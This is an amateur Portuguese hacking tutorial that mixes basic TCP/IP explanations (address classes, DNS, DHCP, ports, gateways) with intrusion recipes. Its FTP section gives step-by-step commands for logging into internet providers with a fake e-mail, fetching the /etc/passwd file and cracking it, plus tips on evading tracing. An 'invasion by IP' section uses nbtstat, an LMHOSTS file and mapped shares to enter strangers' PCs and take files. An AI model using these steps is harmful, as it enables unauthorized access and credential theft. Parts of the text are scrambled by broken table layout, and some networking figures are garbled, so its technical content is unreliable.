COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É
ACESSADO ATRAVÉS DA CAMADATCP/IP, E SÃO
IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AO
PRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO
DO TCP/IP TAMBÉM SÃO FREQUENTES, COMO IREMOS
VER A SERGUIR.
PARA QUE UM INVASOR POSSA EXPLORAR AS FALHAS DA
SERGURANÇA NOS VÁRIOS SISTEMAS DE SUA MÁQUINA,
ELE PRECISA SABER ANTES O QUE ESTÁ DISPONÍVEL.
EXSTEM DOIS MÉTODOS BASTANTE UTILIZADOS PARA
ESTE TIPO DE COLETA DE DADOS. A VARREDURA DE
PORTAS (PORT SCAN) E A IMPRESSÃO DIGITEL
(FINGERPRINT) DO SISTEMA OPERACIONAL.
PORT SCANS
USANDO PROGRAMAS ESPECIAIS, O INVADOR LANÇA
SONDAS (PACOTES IP ESPECIAIS), TENTANDO
ESTABELECER CONEXÕES COM CADA UMA DAS 65535
PORTAS DO SEU COMPUTADOR. SE EXISTE ALGUM
SERVIÇO ASSOCIADO A ALGUMA PORTA, ELE IRÁ
RESPONDER. DESTA MANEIRA, O INVASOR CONSEGUE
SABER, EM POUCOS SEGUNDOS, O QUE ESTÁ RODANDO
EM SUA MÁQUINA.
IMPRESSÃO DIGITAL
ATRAVÉS DO ENVIO DE UMA SEQUENCIA ESPECIAL DE
PACOTES IP A UM SITE ESPECÍFICO, PODE-SE DETECTAR
QUE SISTEMA OPERACIONAL ESTÁ RODANDO
ANALIZANDO OS PACOTES QUE ELE ENVIA DE VOLTA. COM
POSSE DESSAS INFORMAÇÕES, ELE JÁ SABE QUE
FERRAMENTAS UTILIZAR PARA TENTAR INVADIR OU
VANDALIZAR O SEU MICRO. E É NESTE PONTO QUE VOCÊ
DEVE PRESTAR MUITA ATENÇÃO. QA INFORMAÇÃO É A
ALMA DO NEGÓCIO. A INVASÃO DE SISTEMAS É
BASICAMENTE UMA TAREFA DE PESQUISA E COLETA DE
DADOS. QUANTO MAIS INFORMADO E ATUALIZADO VOCÊ
ESTIVER, MENOS CHANCES TERÁ DE RECEBER UM
ATAQUE NO FUTURO.
INVADINDO FTP´S
ATAQUE POR FTP (ML HACKING)
INGREDIENTES:
COMPUTADOR LIGADO À INTERNET
PROGRAMA FTP.EXE
UM CÉREBRO DE DOIS NEURÔNIOS NO MÍNIMO, SE NÃO O
PROGRAMA NÃO RODA DIREITO.
E UM PROVEDOR DE INTERNET PEQUENO A GOSTO.
MODO DE PREPARO:
LIGUE O COMPUTADOR.
CONECTE-SE À INTERNET.
CLIQUE EM INICIAR OU START, DEPENEENDO DO
RUINDOWS.
CLIQUE EM EXECUTAR.
DIGITE FTP E CLIQUE EM OK.
DEPOIS O PROGRAMA COMEÇARÁ.
AÍ VOCÊ VERÁ "FTP>"
DAÍ DIGITE OPEN www.provedor .COM.BR
NO LOGIN DIGITE: "ANONYMOUS"
NA SENHA DIGITE QUALQUER E-MAIL QUE NÃO SEJA O
SEU E TEM QUE SER UM QUE NÃO CHAME MUITO A
ATENÇÃO.
VOCÊ ESTARÁ DENTRO DO PROVEDOR ESCOLHIDO. E
AGORA? O QUE FAZER? EU IREI LEVÁ-LO AO ARQUIVO QUE
CONTÉM A SENHA, MAS DEPOIS VICÊ PODERÁ FAZER O
QUE QUISER EM OUTRO PROVEDOR.
DIGITE LS –AFL PARA LISTAR TODOS OS ARQUIVOS E
DIRETÓRIOS DO PROVEDOR.
SE HOUVER O DIRETÓRIO ETC, DIGITE CD ETC, PARA
MUDAR O DIRETÓRIO, SE NÃO TIVER DIGITE CLOSE.
DIGITE LS –LA. SE HOUVER O ARQUIVO PASSWD DIGITE
GET PASSWD, SE NÃO DIGITE CLOSE.
PRONTO. TERMINADA A INVASÃO PEGUE O PROGRAMA
JACK QUE TIRA AS SENHAS DO ARQUIVO.
COLOCANDO NO PW FILE: PASSWD E NA OUTRA ENTRADA
DE DADOS, QUE EU ESQUECI O NOME COLOQUE A SUA
WORDLIST.
SE VOCÊ NÃO TIVER NENHUM PROGRAMA DE FTP USE O
DO MS-DOS. VÁ AO PROMPT E DIGITE FTP. IRÁ APARECER
O PROMPT FTP>, DIGITE OPEN, IRÁ ABRIR OUTRO
PROMPT. DITE ENTÃO O ENDEREÇO DO HOST PU O SEU IP.
AO CONECTAR ELE PEDIRÁ A SENHA E A PASSWORD,
TENTE USAR OS PASSWORDS DO UNIX, SE NÃO DER VOCÊ
PODE ENTRAR INVISÍVEL. COMO EMTRAR INVISÍVEL?
NOLOGIN PRECIONE ENTER, NO PASSWORD PRECIONE
NOVAMENTE. DEPOIS DIGITE "QUOTE USER FTP", DÊ UM
ENTER E DIGITE "QUOTE CWD~ROOT", PRECIONE ENTER
NOVAMENTE E DIGITE "QUOTE PASS FTP". PRONTO, VOCÊ
ESTÁ HACKEANDO...
NÃO TENTE HACKEAR USANDO O USER NORMAL DE FTP´S,
QUE É LOGIN ANONYMOUS PASSWORD E-MAIL, POIS SERÁ
APLICADO O MODO DE PROTEÇÃO...
MEU DEUS, EU ENTREI, E AGORA O QUE EU FAÇO?
AO ENTRAR VOCÊ VAI ESTAR NO DIRETÓRIO DO LOGIN,
TIPO HOMEROOT. DAÍ, PARA VER A LISTA DE USERS VOCÊ
VOLTA UM DIR E DIGITE DIRHOME, E CADA DIR É UM
USUÁRIO. NÃO TENTEM PEGAR AS SENHAS POIS ESTÃO
CRIPTOGRAFADAS, POIS A MAIORIA DOS USERS USA A
MESMA SENHA LOGIN. SE VOCÊ NÃO SOUBER OS
COMANDOS DE FTP, DIGITE ? E TECLE ENTER. DAÍ, É SÓ
HACKEAR. NUNCA FIQUE MAIS DO QUE 5 MINUTOS EM UM
PROVEDOR, SE NÃO ELE CAÇARÁ O SEU IP, DAÍ É
CADEIA!!!!!!.
FTP DO DOS
COMANDOS
FUNÇÕES
APPEND
ACRESCENTAR UM ARQUIVO
ASCII
DEFINIR UM TIPO DE TRANFERÊNCIA ASCII PUT
ENVIAR UM ARQUIVO
BELL
EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO PWD
IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA
BINARY
DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA QUIT
TERMINAR A SESSÃO DE FTP E SAIR
BYE
TERMINAR SEÇÃO DE FTP E SAIR QUOT
ENVIAR UM COMANDO ARBITRÁRIO
CD
ALTERAR A PASTA DE TRABALHO REMOTA RECV
RECEBER ARQUIVO
CLOSE
TERMINAR SESSÃO DE FTP REMOTEHELP
OBTER AJUDA A PARTIR DO SERVIDOR REMOTO
DELETE
EXCLUIR PASTAS DE TRABALHO REMOTA RENAME
RENOMEAR ARQUIVO
DEBUG
LIGAR/DESLIGAR MODO DE DEPURAÇÃO RMDIR
REMOVER PASTA DA MÁQUINA REMOTA
DIR
LISTAR CONTEÚDO DA PASTA REMOTA SEND
ENVIAR ARQUIVO
DISCONNECT
TERMINAR SESSÃO DE FTP STATUS
MOSTRAR STATUS ATUAL
GET
RECEBER ARQUIVO TRACE
LIGAR/DESLIGAR RASTREAMENTO DE PACOTES
GLOB
LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE TYPE
ARQUIVOS LOCAIS DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS

HASH USER
LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER ENVIAR INFORMAÇÕES DE NOVO USUÁRIO
TRANSFERIDO
VERBOSE
HELP
AJUDA DO FTP Invasão por IP
Passa-a-passo: 1º- Certifique-se de que você possui este
LCD programa nbstat:
ALTERAR A PASTA DE TRABALHO LOCAL
2º- Vá ao Prompt do MS-DOS.
LITERAL
ENVIAR UM COMANDO DE FTP ARBITÁRIO 3º- Digite: nbtstat -a o IP do cara que você quer invadir

LS 4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as

LISTAR O CONTEÚDO DA PASTA REMOTA pastas do PC dela. Se não aparecerá : Host Not Found (o foda é
que não da para invadir o computador de certos caras por causa
MDELETE disso então não se entusiasme tanto pois só da para invadir
EXCLUI VÁRIOS ARQUIVOS aquelas pessoas que tem no PC compartilhamento de arquivos
as pastas)
MDIR
LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS 5º- Caso apareça um monte de nomes esquisitos com isso
antes : "<03>", você deve pegar o nome do negócio que estiver
M GET com <03> atrás do nome.
OBTER VÁRIOS ARQUIVOS
6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O
MKDIR IP do cara NetBios dele . O NetBios é aquele nome esquisite que
CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA tem o atras. (Digite exatamente daquela forma que eu digitei)

MLS 7º- Mapeie sua unidade de disco de forma que a máquina do

LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS cara se torne parte de seu PC.

MPUT 8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha

ENVIAR VÁRIOS ARQUIVOS "OK"

OPEN 9º- Pronto! Você invadiu por IP!

CONECTAR AO FTP REMOTO
10º- Conselho : Nunca apague nem modifique NADA somente
PROMPT fuce bastante nas coisas do lammaH e se achar algo
FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS interessante pega para você. OBS: Tem algumas pessoas que
renomeiam o arquivo vnbt.386 no windowssystem para que se DE IP É DIVIDO EM DUAS PARTES: O ENDEREÇO DA REDE
alguem tente te nukar ou invadir não consiga... ; pois bem você EO ENDEREÇO DA SUBREDE. CONSIDERE O NÚMERO DE
vai ter que renomear o seu arquivo senão não da para invadir. IP DA SEGUINTE FORMA: W.X.Y.Z.

PROTOCOLOS DE REDE CLASSE

TCP/IP SE REFERE AO CONJUNTO DE PROTOCOLOS N º DE IP
USADOS NA INTERNET. ELE INCLUI UMA SÉRIE DE INDICADOR DA REDE
PADRÕES QUE ESPECIFICAM COMO OS COMPUTADORES INDICADOR DA SUB REDE
VÃO SE COMUNICAR E CRIA CONVENÇÕES PARA NºDE REDES DISPONÍVEIS
INTERCONECTAR REDES PARA O ROUTEAMENTO NºDE SUB REDES DISPONÍVEIS
ATRAVÉS DESSAS CONEXÕES.
A
OS PROTOCOLOS DA INTERNET (IP), SÃO UM RESULTADO 1.126
DO PROJETO DA DARPA, SOBRE CONECTIVIDADE ENTRE w
REDES NO FINAL DOS ANOS 70. ELE FOI UTILIZADO EM x.y.z
TODAS AS REDES DE LONGA DOSTÂNCIA DO SISTEMA DE 126
DEFESA DOS EUA EM 1983, MAS NÃO FOI RAPIDAMENTE 16,777,214
ACEITO ATÉ SER INCORPORADO AO BSD UNIX 4.2.
B
A POPULARIDADE DO TCP/IP É BASEADO EM: 128.191
w.x
ESTRUTURA CLIENTE SERVIDOR ROBUSTA: O TCP/IP É y.z
UMA ÓTIMA PLATAFORMA CLIENTE SERVIDOR, 16,384
ESPECIALMENTE EM AMBIENTES WAN. 65,534

COMPARTILHAMENTO DE INFORMAÇÕES: MILHARES DE C

INFORMAÇÕES MILITARES, EDUCACIONAIS, CIENTÍFICAS, E 192.223
COMERCIAIS COMPARTILHAM DADOS, CORREIO w.x.y
ELETRÔNICO E OUTROS SERVIÇOS DA INTERNET USANDO z
O TCP/IP. AMPLA DISPONIBILIDADE. IMPLEMENTAÇÕES DO 2,097,151
TCP/IP ESTÃO DISPONÍVEIS EM PRATICAMENTE TODOS OS 254
SISTEMAS OPERACIONAIS POPULARES. SEU CÓDIGO É
AMPLAMENTE DISPONÍVEL EM VÁRIAS IMPLEMENTAÇÕES. OBS: O ENDEREÇO 192.168 É RESERVADO PARA USO EM
FABRICANTES DE BRIDGES, ROUTERS E ANALIZADORES REDES INTERNAS, O ENEREÇO 127 É UTILIZADO PARA
DE REDES OFERECEM SUPORTE PARA O TCP/IP EM SEUS TESTES DE LOOP BACK E OS ACIMA DE 224 SÃO
PRODUTOS. RESERVADOS PARA PROTOCOLOS ESPECIAIS.

CONCEITOS UMA SUB REDE É UMA REDE LIGADA DIRETAMENTE

EXISTEM ALGUNS CONCEITOS QUE SÃO IMPRECINDÍVEIS
EM RELAÇÃO AO TCP/IP E DE REDES QUE O UTILIZAM.
NÚMERO
EXISTEM ALGUMAS ANALOGIAS ENTRE COMPUTADORES E
TELEFONES E O NÚMERO DE IP É UMA DELAS. VOCÊ PODE
IMAGINAR O NÚMERO DE IP COMO UM NÚMERO DE
TELEFONE COM TODOS OS CÓDIGOS DE DISCAGEM
INTERNACIONAL. ISTO SE SIGNIFICA QUE QUALQUER
MÁQUINA PODE SE CONECTAR A OUTRO USANDO O
NÚMERO DE IP, BASTADO QUE EXISTA APENAS UM
CAMINHO ENTRE AS DUAS. ALÉM DISSO, TODA MÁQUINA
NA REDE TEM DE TER UM NÚMERO DE IP.
ISTO TAMBÉM SIGNIFICA QUE DUAS MÁQUINAS NA MESMA
REDE NÃO PODEM TER O MESMO NÉMERO DE IP. ESTA
RESTRIÇÃO SÓ OCORRE PARA MÁQUINAS NA MESMA
REDE, POIS MÁQUINAS NUMA REDE NÃO CONECTADA
USUALMENTE TEM NÚMERO DE IP IGUAIS, POR ALGUMAS
CAUSAS TÉCNICAS. NO CASO DA ANALOGIA COM
TELEFONES, IMAGINE DUAS PESSOAS MORANDO EM
PAÍSES DIFERENTES QUE POSSUAM O MESMO NÚMERO
DE TELEFONES (APENAS OS NÚMEROS LOCAIS). NESSE
CASO NÃO HÁ CONFLITO.
O NÚMERO DE IP TEM 4 BYTES DE TAMANHO E TEM UM
FORMATO ESPECÍFICO XXX.XXX.XXX.XXX (EXEMPLO:
200.212.235.122). ISSO SIGNIFICA QUE CADA
AGRUPAMENTO PODE IR DE 0 À 255 (POIS ESSA É A
CAPACIDADE DE 1 BYTE)
MÁSCARA
EXISTEM TRÊS CLASSES DE ENDEREÇOS IP: CLASSES A,
B, C. A DIFERENÇA ENTRE AS CLASSES É A FORMA DE
COMO O ENDEREÇO DE IP É INTERPRETADO. O NÚMERO
ATRAVÉS DE UMA REDE PERTENCENTE À INTERNET. A
REDE PERTENCENTE RECEBE UM NÚMERO DE IP E
DITRIBUI O NÚMERO DE IP DENTRO DE SUA SUB REDE. AS
CLASSES APENAS DEFINEM QUEANTAS SUB REDES UM
NÚMERO DE IP TEM. DE ACORDO COM A TABELA, EXISTEM
126 NÚMEROS DE IP DQA CLASSE A E CADA UM DELES
PODE TER CERCA DE 16.777.214 SUB REDES. VOCÊ LOGO
PODE IMAGINAR QUE NÃO EXISTAM ENDEREÇOS DE
CLASSE A E B NA INTERNET, E QUE OS DA CLASSE C
ESTÃO ACABANDO, A IETF ESTÁ ESTUDANDO A EXPANSÃO
DESSES NÚMEROS.
AS MÁSCARAS DE SUB REDE IDENTIFICAM A CLASSE DO
NÚMERO DE IP. A PRIMEIRA VISTA PARECE
DESNECESSÁRIO, POIS BASTA OLHAR O PRIMEIRO
NÚMERO DO IP PARA DETERMINAR A CLASSE. MAS
ACONTECE QUE UM NÚMERO DE IP DA CLASSE A PODE
FUNCIONAR COMO UM DA CLASSE B OU CLASSE C,
DEPENDENDO DA ESTRUTURA INTERNA DA SUA SUB
REDE. UM EXEMPLO: IMAGINE UMA EMPRESA COM 200
FILIAIS NO BRASIL CONECTADAS POR UMA REDE PRÓPRIA.
A MATRIZ TEM UM NÚMERO DE IP DE CLASSE A, DIGAMOS
100 E DISTRIBUI AS SUAS SUB REDES DA SEGUINTE
FORMA:
100.1.0.0
Matriz
100.2.0.0
Filial 1
100.3.0.0
Filial 2
100.201.0.0
Filial 200

PARA AS FILIAIS, O NºDE IP (EX: 100.201.0.0) É DE CLASSE
B, POIS SÓ TEM 16.384 SUBREDES DISPONÍVEIS, EMBORA
COMECE COM 100. DENTRO DAS FILIAIS AINDA É POSSÍVEL
SE DISTRIBUIR SUB REDES, AS QUAIS TERIAM NÚMEROS
DE IP CLASSE C.
PARA QUE O ROTEAMENTO FUNCIONE CORRETAMENTE,
OS COMPUTADORES PRECISAM SABER QUAL A CLASSE
DO NÚMERO DE IP, E ELAS SÃO AS SEGUINTES:
Classe
Máscara de Sub-rede
A EXISTE UMA BOA ANALOGIA PARA O DHCP, PORTANTO
255.0.0.0
B PROTOCOLO DE CONFIGURAÇÃO DE HOST DINÂMICO.
255.255.0.0
C SIGNIFICA QUE ANTES DE COLOCAR UMA NOVA MÁQUINA
255.255.255.0
GATEWAY
GATEWAY PADRÃO É A MÁQUINA PÁRA QUEM PEDIMOS
AJUDA QUANDO NÃO CONSEGUIMOS ACHAR UMA OUTRA
MÁQUINA NA REDE. FUNCIONA ASSIM: QUANDO UMA
MÁQUINA DA REDE PRECISA SE COMUNICAR COM OUTRA,
ELA EMITE UM PEDIDO DE CONEXÃO (ESSE PEDIDO É
FEITO ATRAVÉS DO BROADCASTING, OU SEJA, A MÁQUINA
QUE ENVIA O PEDIDO A TODA A REDE, E APENAS A
MÁQUINA DESTINO RESONDE), E AGUARDA UMA
RESPOSTA. SE ELA NÃO VIER, ELA ENTRA EM CONTATO
COM O GATEWAY PADRÃO E SOLICITA QUE O MESMO
CONECTE COM A MÁQUINA DESTINO. SE O GATEWAY
CONSEGUIR CONECTAR À MÁQUINA DESTINO, ELE FICA
COMO INTERMEDIADOR DESSA CONEXÃO, CASO
CONTRÁRIO, ELE VISA A MÁQUINA SOLICITANTE QUE NÃO
FOI POSSÍVEL ENCONTRAR A MÁQUINA DESTINO. ESSA
ESTRUTURA DE PROCURA VISA DIMINUIR O TRÁFEGO
DESNECESSÁRIO NA REDE. IMAGINE SÓ SE TODA A
CONEXÃO REALIZADA NA INTERNET (E TODAS AS REDES
CONECTADAS A INTERNET) FOSSE ENVIADA A TODOS OS
COMPUTADORES LIGADAS A ELA. SERIA UM TRÁFEGO
MUITO GRANDE. AO INVÉS DISSO, O BROADCAST É
DIVIDIDO EM NÍVEIS, PRIMEIRO NA LAN (LOCAL AREA
NETWORK OU REDE LOCAL) DEPOIS NA WAN DE SUA
CIDADE OU ESTADO, DEPOIS NA WAN NACIONAL ATÉ
CHEGAR NA WAN INTERNACIONAL. REDUZ-SE DESSE
MODO TODO O TRÁFEGO INTERNO ÀS WANS E LANS
ALIVIANDO AS LINHAS DE CONEXÃO.
DNS
ESSAS 3 LETRAS NÃO SEIGNIFICAM MUITO PARA A
MAIORIA DAS PESSOAS, MAS ELAS DIGNIFICAM DOMAIN
NAME SYSTEM. ESSAS 3 PALAVRAS TAMBÉM NÃO
SIGNIFICAM COISA ALGUMA PARA A MIORIA DAS PESSOAS,
POR ISSO, VAMOS À ANALOGIA COM O TELEFONE.
QUANDO VOCÊ DESEJA TELEFONAR PARA A LOJA DA
ESQUINA, VOCÊ CONSULTA O CATÁLOGO, DESCOBRE O
TELEFONE DE LÁE LIGA. VOCÊ NÃO CONSEGUE
TELEFONAR PARA ALGUM LUGAR SE NÃO SOUBER O
NÚMERO. NA REDE TCP/IP ACONTECE A MESMA COISA. OS
USUÁRIOS NÃO DECORAM O NÚMERO DE IP DAS
MÁQUINAS, E SIM OS NOMES. MAS PARA SE ALCANÇAR
UMA MÁQUINA NA REDE PRECISAMOS DO SEU NÚMERO
DE IP. PARA RESOLVER ISSO FOI CRIADO O DNS, UM
SERVIÇO DISPONÍVEL NA REDE QUE, DADO UM NOME DE
MÁQUINA, ELE RETORNA O NÚMERO DE IP DA MESMA.
EXISTE UMA PARTICULARIDADE AQUI. NO CASO DA REDE
LOCAL ESTAR CONECTADA A ALGUMA OUTRA, É
RECOMENDÁVEL QUE O SERVIDOR DNS, SEJA
EXECUTADO NA MÁQUINA DE LIGAÇÃO ENTRE AS DUAS
REDES (O GATEWAY), PARA CASO DE O NOME
REQUISITADO NÃO EXISTIR NA REDE LOCAL , O DNS
POSSA PEDIR AO SERVIDOR DNS DA OUTRA REDE PARA
PESQUISAR O TAL NOME.
O WINDOWS NT OFERECE UM SERVIÇO SEMELHANTE, O
WINS (WINDOWS INTERNET NEME SYSTEM OU SISTEMA DE
NOMES DA INTERNET DO WINDOWS). A PRINCIPAL
DIFERENÇA ENTRE OS DOIS É QUE O DNS USA UMA
TABELA ESTÁTICA, E O WINS USA UMA TABELA DINÂMICA.
NO CASO DO SERVIDOR DNS RODAR NUMA MÁQUINA DO
WINDOWS NT É RECOMENDÁVEL QUE ELE SEJA
SUSTIUÍDO PELO WINS.
DHCP
MAIS UM CASO DE LETRAS QUE NÃO SIGNIFICAM NADA
PARA A MIORIA DOS USUÁRIOS. MAS INFELIZMENTE NÃO
VAMOS DIRETO AO ASSUNTO. DHCP SIGNICA "DINAMIC
HOST CONFIGURATION PROTOCOL", OU SEJA:
NIAM REDE TCP/IP, TODO COMPUTADOR, TODO
COMPUTADOR TEM DE TER UM IP DISTINTO. ISSO
NA REDE, O ADMINISTRADOR TERIA DE IDENTIFICAR
QUAIS NÚMEROS ESTÃO SENDO UTILIZADOS PARA
ESCOLHER UM NÚMERO ADEQUADO PARA A NOVA
MÁQUINA. EM PEQUENAS REDES ISSO É POSSÍVEL SER
FEITO, MAS EM GRANDES REDES ISSO SE TORNA UMA
TAREFA TEDIOSA E SUJEITA A FALHAS. PARA EVITAR ISSO
FOI CRIADO O DHCP. QUANDO UMA MÁQUINA ENTRA NA
REDE, ELA PROCURA O SERVIDOR DHCP (CUJO NÚMERO
DE IP FOI PREVIAMENTE FORNECIDO) E SOLICITA UM
NÚMERO DE IP PARA SI PRÓPRIA. O SERVIDOR VERIFICA
QUAL O NÚMERO DISPONÍVEL, INFORMA AO SOLICITANTE
ESSE NÚMERO E O TORNA INDISPONÍVEL PARA FUTURAS
SOLICITAÇÕES. DESSA MANEIRA A ADMINISTRAÇÃO DOS
NÚMEROS DE IP SÃO FEITAS AUTOMATICAMENTE E NÃO
EXISTEM PROBLEMAS DE CONFLITO. QUANDO A MÁQUINA
SOLICITANTE SAI DA REDE, O SERVIDOR DHCP TORNA
ESSE NÚMERO DISPONÍVEL NOVAMENTE.
PORTAS
UMA PORTA PODE SER VISTA COMO UM CANAL DE
COMUNICAÇÕES PARA UMA MÁQUINA. PACOTES DE
INFORMAÇÕES CHEGANDO A UMA MÁQUINA NÃO SÃO
APENAS ENDEREÇADAS À MÁQUINA, E SIM A MÁQUINA
NUMA DTERMINADA PORTA. VOCÊ PODE IMAGINAR UMA
PORTA COMO SENDO UM CANAL DE RÁDIO, COM A
DIFIRENÇA FUNDAMENTAL DE QUE UM COMPUTADOR
PODE "OUVIR" TODOS OS 65000 CANAIS POSSÍVEIS AO
MESMO TEMPO.
ENTRETANTO, UM COMPUTADOR GERALMENTE NÃO ESTÁ
OUVINDO EM TODAS AS PORTAS, ELE ESCUTA A ALGUMAS
PORTAS ESPECÍFICAS. E ELE NÃO VAI RESPONDER A UM
PEDIDO A UMA PORTA QUE ELE NÃO ESTEJA ESCUTANDO.
EXISTEM UMA SÉRIE DE PORTAS PRÉ DEFINIDAS PARA
CERTOS SERVIÇOS QUE SÃO ACEITOS UNIVERSALMENTE.
AS PRINCIPAIS SÃO:
SERVIÇO
PORTA
DESCRIÇÃO
FTP
21
PROTOCOLO DE TRANSFERÊNCIA DE ARQUIVOS
TELNET
23
PARA SE CONECTAR REMOTAMENTE A UM SERVIDOR
SMTP
25
PARA ENVIAR UM EMAIL
GOPHER
70
BROWSER BASEADO EM MODO TEXTO
HTTP
80
PROTOCOLO WWW – NETSCAPE, MOSAIC
POP3
110
PARA RECEBER EMAIL
NNTP
119
NEWS GROUPS
IRC
6667
INTERNET RELAY CHAT – BATE PAPO ONLINE
COMPUSERV
4144
COMPUSERV WINCIM
AOL
5190
AMERICA ONLINE
MSN
569
MICROSOFT NETWORK
OUTROS
OUTROS
OUTROS
ROTEADOR: É UM COMPUTADOR QUE É UTILIZADO PARA
CONECTAR DUAS OU MAIS REDES DISTINTAS. ELE TEM
ESSE NOME PORQUE TEM DE ROTEAR (OU DIRECIONAR)
OS PACOTES DE UMA REDE PARA OUTRA, ATUANDO
COMO UM GUARDA DE TRÂNSITO PARA OS PACOTES
ENTRE AS REDES.
GATEWAY: O GATEWAY TAMBÉM É UM COMPUTADOR QUE
SERVE PARA CONECTAR DUAS OU MAIS REDES
DISTINTAS. A PRINCIPAL DIFERENÇA PARA O ROTEADOR É
QUE O GATEWAY NÃO TEM UM HARDWARE ESPECIAL
PARA O ROTEAMENTO. USUALMENTE OS GATEWAYS
CONECTAM LANS E OS ROTEADORES, WANS. EM VÁRIOS
CASOS SE UTILIZA UM ROTEADOR EM CONJUNTO COM O
GATEWAY.
VISÃO: UMA REDE UTILIZANDO O TCP/IP TEM UMA
ESTRUTURA BÁSICA COMPOSTA POR UM OU MAIS
SERVIDOR RODANDO UM SERVIDOR DNS (OU WINS),
DHCP, SMTP, POP3, E OS SERVIDORES DOS SERVIÇOS
DESEJADOS (HTTP, TELNET, GOPHER, ETC) E AS MÁQUINA
CLIENTES SOLICITANDO ESSES SERVIÇOS. PARA SE
INTERLIGAR ESSA REDE A OUTRA REDE TCP/IP, SE FAZ
NECESSÁRIO O USO DE UM ROTEADOR OU GATEWAY E DA
CORRETA CONFIGURAÇÃO DA REDE.
EXISTEM DUAS MANEIRAS DE SE LIGAR A LAN À INTERNET:
ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA CADA
MÁQUINA NA REDE, O QUE PODE SER IMPOSSÍVEL PARA
REDES COM MUITAS MÁQUINAS.
ATRIBUI-SE UM NÚMERO DE IP VÁLIDO PARA O GATEWAY
E UTILIZANDO-SE O NÚMERO DE IP 192.168.X.X
INTERNAMENTE.
COMO O SEGUNDO CASO É O MAIS FACTÍVEL, VAMOS
OBERVÁ-LO MELHOR. NELE, SE UTILIZA INTERNAMENTE A
LAN O IP 192.168.X.X , QUE , QUANDO DA DETERMINAÇÃO
DOS NÚMEROS DE IP FOI RESERVADO PARA O USO DE
REDES INTERNAS, OU SEJA, NENHUMA MÁQUINA LIGADA
DIRETAMENTE A INTERNET TEM UM IP 192.168.X.X. ISSO É
NECESSÁRIO POIS COMO JÁ VIMOS NENHUMA MÁQUINA
PODE TER UM NÚMERO DE IP QUE JÁ ESTEJA SENDO
UTILIZADO POR UMA OUTRA MÁQUINA.
O GATEWAY TEM DUAS INTERFACES DE REDE, UMA PARA
SE CONECTAR À INTERNET E OUTRA PARA SE CONECTAR
À LAN. A INTERFAE DA INTERNET É ATRIBUIDO O NÚMERO
DE IP VÁLIDO NA INTERNET E NA LAN O NÚMERO DE IP DO
TIPO 192.168.X.X (USUALMENTE 192.168.0.1). NAS
MÁQUINAS DA LAN O NÚMERO DO IP É DO TIPO 192.168.X.X
(ONDE O PRIMEIRO X É O MESMO DO GATEWAY) E O
GATEWAY DEFALT É O IP DO GATEWAY VOLTADO PARA A
LAN (192.168.X.X). DESSA FORMA PODEMOS TER ATÉ
16.384 MÁQUINAS NA INTERNET POR NÚMERO DE IP
VÁLIDO. ESSA ESTRUTURA TAMBÉM FACILITA A ADOÇÃO
DE MEDIDAS DE SEGURANÇA CONTRA INTRUSOS DA
INTERNET, POIS COMO TODO O TRÁFEGO NA INTERNET
PASSA PELO GATEWAY, BASTA PROTEGÊ-LO PARA
PROTEGER TODA A LAN.
PROTOCOLOS
TCP E IP: O TCP E O IP SÃO APENAS DOIS MEMBROS DA
FAMÍLIA TCP/IP. IP É UM PROTOCOLO QUE PROVIDENCIA A
ENTREGA DE PACOTES PARA TODOS OS OUTROS
PROTOCOLOS DA FAMÍLIA TCP/IP. O IP FORNECE UM
SISTEMA DE ENTREGA DE DADOS SEM CONEXÃO. ISTO É,
OS PACOTES IP NÃO SÃO GARANTIDOS DE CHEGAREM AO
SEU DESTINO, NEM DE SEREM RECEBIDOS DA FORMA QUE
FORAM ENVIADOS. O CHECK SUN DO IP CONFIRMA
APENAS A INTEGRIDADE DO CABEÇALHO DO PACOTE.
DESTA MANEIRA, A RESPONSABILIDADE PELOS DADOS
CONTIDOS NO PACOTE DO IP (E SUA SEQUÊNCIA) É
TAREFA DE PROTOCOLOS DE MAIS ALTO NÍVEL.
TALVEZ O PROTOCOLO DE MAIS ALTO NÍVEL DO IP SEJA O
TCP. O TCP OFERECE UM CONFIÁVEL PROTOCOLO
BASEADO EM CONEXÃO CAPSULADO NO IP. O TCP
GARANTE A ENTREGA DOS PACOTES, ASSEGURA O
SEQUENCIAMENTO DOS PACOTES E PROVIDENCIA UM
CHECKSUN QUE VALIDA TANTO O CABEÇALHO QUANTO
OS DADOS DO PACOTE. NO CASO DA REDE PERDER OU
CORROMPER UM PACOTE TCP/IP DURANTE A
TRANSMISSÃO, É TAREFA DO TCP RETRANSMITIR O
PACOTE FALTOSO OU INCORRETO. ESSA CONFIABILIDADE
TORNA O TCP/IP O PROTOCOLO ESCOLHIDO PARA
TRANSMISSÕES BASEADAS EM SESSÃO, APLICATIVOS
CLIENTE-SERVIDOR E SERVIÇOS CRÍTICOS COMO
CORREIO ELETRÔNICO.
PORÉM, ESSA CONFIABILIDADE TEM UM PREÇO. OS
CABEÇALHOS DOS PACOTES TCP REQUEREM USO DE
BITS ADICIONAIS PARA ASSEGURAR O CORRETO
SEQUENCIAMENTO DA INFORMAÇÃO, BEM COMO UM
CHECK SUN OBRIGATÓRIO PARA GARANTIR A
INTEGRIDADE DO CABEÇALHO E DOS DADOS. PARA
GARANTIR A ENTREGA DOS PACOTES, O PROTOCOLO
TAMBÉM REQUER QUE O DESTINATÁRIO INFORME O
RECEBIMENTO DO PACOTE.
TAL INFORMÇÃO DE RECEBIMETO (OU ACKS) GERAM
TRÁFEGO ADICIONAL NA REDE, DIMINUINDO A TAXA DE
TRANFERÊNCIA DE DADOS EM FAVOR DA
CONFIABILIDADE. PARA REDUZIR O IMPACTO NA
